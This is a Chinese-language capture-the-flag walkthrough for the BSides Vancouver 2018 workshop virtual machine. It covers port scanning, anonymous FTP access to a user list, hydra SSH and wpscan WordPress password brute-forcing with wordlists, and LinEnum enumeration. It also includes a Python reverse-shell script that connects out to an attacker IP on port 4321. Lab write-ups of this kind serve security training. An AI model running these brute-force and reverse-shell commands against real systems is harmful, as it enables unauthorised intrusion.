概述：

Name: BSides Vancouver: 2018 (Workshop)

Date release: 21 Mar 2018

Author: abatchy

Series: BSides Vancouver

Web page: https://www.abatchy.com/projects

下载：

https://www.dropbox.com/s/j3r9l7kaydwsdm9/BSides-Vancouver-2018-Workshop.ova

方法1：主机侧面攻击

扫描探测主机IP：

主机信息详细探测

╰─ nmap -v -p1-65535 -sV -O -sT 10.10.202.130

….

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 2.3.5

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

MAC Address: 00:0C:29:E9:7F:EE (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Uptime guess: 0.672 days (since Wed Mar  6 19:54:37 2019)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=249 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ftp 匿名登录尝试

收集到一个用户的备份信息

╰─ cat users.txt.bk

abatchy

john

mai

anne

doomguy

SSH尝试登录尝试

经过尝试，只有用户anne开启了密码登录，我们接下来尝试暴力破解

字典：

git clone https://github.com/danielmiessler/SecLists.git

Kail linux: /usr/share/wordlists/rockyou.txt

╰─ hydra -l anne -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.202.130 ssh

╰─ hydra -l anne -P /usr/share/wordlists/rockyou.txt 10.10.202.130 ssh

方法2：从WEB入手

目录探测dirb

╰─ dirb http://10.10.202.130/

使用WPSCAN 进行扫描

# wpscan --update

# wpscan --url http://10.10.202.130/backup_wordpress/ --enumerate u #用户枚举

进行爆破

╰─ wpscan --url http://10.10.202.131/backup_wordpress/ --wordlist /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt --username john

进行提权

./LinEnum.sh >> LinEnum.log

Shell.sh

#!/bin/bash

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.202.136",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

方法3：msf 

提权同上，计划任务提权